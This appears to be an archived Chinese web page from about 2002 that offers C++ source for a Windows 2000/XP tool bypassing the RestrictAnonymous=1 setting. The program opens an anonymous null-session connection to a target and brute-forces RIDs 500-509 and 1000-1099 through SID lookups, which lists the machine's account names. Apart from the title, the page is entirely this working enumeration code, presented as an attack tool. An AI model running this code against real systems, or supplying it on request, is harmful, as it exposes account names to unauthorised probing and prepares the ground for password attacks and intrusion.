突破“RestrictAnonymous=1”限制枚举帐号的代码

/ns/wz/comp/data/20020819053049.htm

////////////////////////////////////////////////////////////////////////////////
//
// Enum users
//
// File : Enum.cpp
// Comment : For win2k and XP(pro\server\adv)
//
//
// Create by : Refdom
// Email : refdom@263.net
// Home Page : www.opengram.com
//
// If you modify the code, or add more functions, please email me a copy.
//
////////////////////////////////////////////////////////////////////////////////


#include <stdio.h>
#include <iostream.h>
#include <windows.h>
#include <Lm.h>

#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Netapi32.lib")
#pragma comment (lib, "Mpr.lib")

void MyPrintSidInfo(PSID, PSID_NAME_USE);
int MyConnectServer(LPNETRESOURCE, LPCTSTR, LPCTSTR, DWORD, LPTSTR);
int MyDisConnectServer(LPCTSTR, DWORD, BOOL);

int main (int argc, char* argv[])
{
int nRetCode, nSubAuthorityCount, i;
DWORD nSize;
int dwSubAuthority[8];
char szIpc[50] = "";
char szServer[30] = "";
PSID pSid;
PSID pNewSid;
LPTSTR lpDomainName;
LPTSTR lpUserName;
PSID_NAME_USE peUse;
PSID_IDENTIFIER_AUTHORITY pSIA;

nSize = 1024;

pSid = (PSID) LocalAlloc(LPTR, 1024);
lpDomainName = (LPTSTR) LocalAlloc(LPTR, 1024);
peUse = (PSID_NAME_USE) LocalAlloc(LPTR, 1024);
lpUserName = (LPTSTR) LocalAlloc(LPTR, 1024);

sprintf (szIpc, "%s", argv[1]);
sprintf (szServer, "%s", argv[1]);
NETRESOURCE NET;

if (argc<2)
return 0;

NET.lpLocalName = NULL;
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;

printf ("Connecting %s...", szIpc);
nRetCode = MyConnectServer(&NET, "", "", 0, szIpc);
if (nRetCode)
{
printf ("Failed!\n");
return 0;
}
else
{
printf ("Successfully!\n");
}

if (!LookupAccountName(argv[1], "guest", pSid, &nSize, lpDomainName, &nSize, peUse))
{
printf ("Lookup failed!%d\n", GetLastError());
goto End;
}

printf ("DomainName:%s\n", lpDomainName);
pSIA = GetSidIdentifierAuthority(pSid);
MyPrintSidInfo(pSid, peUse);
nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
for (i = 0; i< nSubAuthorityCount; i++)
{
dwSubAuthority[i] = (int) *GetSidSubAuthority(pSid, i);
}

//lookup system account
for (i = 0; i < 10; i++)
{
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(500 + i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d\n",GetLastError());
goto End;
}
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
printf ("Lookup error!%d\n", GetLastError());
break;
}
else
{
printf ("UserName: %s\n", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
FreeSid(pNewSid);
}

//look up user account
for (i = 0; i < 100; i++)
{
FreeSid(pNewSid);
nSize = 1024;
if (!AllocateAndInitializeSid(pSIA, nSubAuthorityCount,
dwSubAuthority[0], dwSubAuthority[1],
dwSubAuthority[2], dwSubAuthority[3],
(1000 + i), dwSubAuthority[5],
dwSubAuthority[6], dwSubAuthority[7],
&pNewSid))
{
printf ("Error SID!%d\n",GetLastError());
goto End;
}
if (!LookupAccountSid(argv[1], pNewSid, lpUserName, &nSize,
lpDomainName, &nSize, peUse))
{
}
else
{
printf ("UserName: %s\n", lpUserName);
MyPrintSidInfo(pNewSid, peUse);
}
}

End:

FreeSid(pNewSid);
FreeSid(pSid);
LocalFree(lpDomainName);
LocalFree(peUse);
Sleep (100);
printf ("Disconnecting server...");
if (MyDisConnectServer(szIpc, CONNECT_UPDATE_PROFILE, TRUE))
printf ("Failed!%d\n", nRetCode);
else
printf ("Successfully!\n");
return 0;
}

void MyPrintSidInfo(PSID pSid, PSID_NAME_USE peUse)
{
int i;
int nSubAuthorityCount;
PSID_IDENTIFIER_AUTHORITY pSIA;

pSIA = GetSidIdentifierAuthority(pSid);
printf ("\tSID:");
if (pSIA->Value[0] == 0 && pSIA->Value[1] == 0)
{
ULONG ulSIA = (ULONG)(pSIA->Value[5] ) +
(ULONG)(pSIA->Value[4] << 8) +
(ULONG)(pSIA->Value[3] << 16) +
(ULONG)(pSIA->Value[2] << 24);
printf ("S-1-%d",ulSIA);
}
else
cout << hex << (USHORT)pSIA->Value[0]
<< (USHORT)pSIA->Value[1]
<< (USHORT)pSIA->Value[2]
<< (USHORT)pSIA->Value[3]
<< (USHORT)pSIA->Value[4]
<< (USHORT)pSIA->Value[5]
<< dec;
nSubAuthorityCount = *GetSidSubAuthorityCount(pSid);
for (i = 0; i< nSubAuthorityCount; i++)
{
printf ("-%d", *GetSidSubAuthority(pSid, i));
}

printf ("\n\tSubAuthorityCount:%d\n", nSubAuthorityCount);
printf ("\tAccountType:");
switch (*peUse)
{
case SidTypeUser:
printf ("User");
break;
case SidTypeGroup:
printf ("Group account");
break;
case SidTypeDomain:
printf ("Domain account");
break;
case SidTypeAlias:
printf ("Alias account");
break;
case SidTypeWellKnownGroup:
printf ("Well-known group");
break;
case SidTypeDeletedAccount:
printf ("Deleted account");
break;
case SidTypeInvalid:
printf ("Invalid account");
break;
case SidTypeUnknown:
printf ("Unkown account");
break;
case SidTypeComputer:
printf ("Computer account");
break;
}
printf ("\n");

return;
}

int MyConnectServer(LPNETRESOURCE lpNetResource,
LPCTSTR lpPassword,
LPCTSTR lpUserName,
DWORD dwFlags,
LPTSTR lpRemoteName)
{
int nRetCode;
int nReturnCode = 0;

//cancel the connect first
nRetCode = WNetCancelConnection2(lpRemoteName, dwFlags, TRUE);

//connect remote server
nRetCode = WNetAddConnection2(lpNetResource, lpPassword, lpUserName, dwFlags);
if (nRetCode != NO_ERROR)
{
if (nRetCode == ERROR_ALREADY_ASSIGNED || nRetCode == ERROR_DEVICE_ALREADY_REMEMBERED)
{
nReturnCode = GetLastError();
}
else
{
switch (nRetCode)
{
case ERROR_ACCESS_DENIED:
nReturnCode = GetLastError();
break;
case ERROR_BAD_NET_NAME:
nReturnCode = GetLastError();
break;
default:
nReturnCode = GetLastError();
break;
}
}
}
return nReturnCode;
}

int MyDisConnectServer(LPCTSTR lpName,
DWORD dwFlag,
BOOL bForce)
{
int nReturnCode = 0;
int nRetCode;
nRetCode = WNetCancelConnection2(lpName, dwFlag, bForce);
if (nRetCode != NO_ERROR)
{
nReturnCode = GetLastError();
}
return nReturnCode;
}